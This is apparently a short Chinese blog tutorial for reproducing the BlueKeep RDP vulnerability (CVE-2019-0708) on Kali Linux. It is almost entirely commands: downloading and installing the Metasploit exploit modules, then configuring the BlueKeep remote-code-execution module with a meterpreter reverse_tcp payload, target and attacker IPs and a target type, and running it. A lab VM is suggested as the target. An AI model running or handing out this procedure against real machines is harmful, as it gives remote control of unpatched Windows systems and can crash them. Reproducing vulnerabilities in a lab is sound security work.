第一次写,简单点 直接照着做就行了
复现CVE-2019-0708
打开kali
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
–no-check-certificate(正常下载不了可以在wget后面加上)
(一般是在这个位置,自己看一下msf的位置)
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
msfconsole
reload_all
search 0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set payload windows/x64/meterpreter/reverse_tcp #设置payload
set rhosts 192.168.168.168 #目标机ip
set lhost 192.168.168.168 #攻击机ip
set rdp_client_ip 192.168.168.168 #目标机ip
unset RDP_CLIENT_NAME #取消设置这个参数
set target 1(真实机)3(虚拟机)
show options
run
记得打开你的虚拟机win7 或者自己下一个靶机
ps:记得打开3389 端口 记得关闭防火墙
netstat -aon 查看是否开了3389端口
一定几率成功 可能会搞蓝屏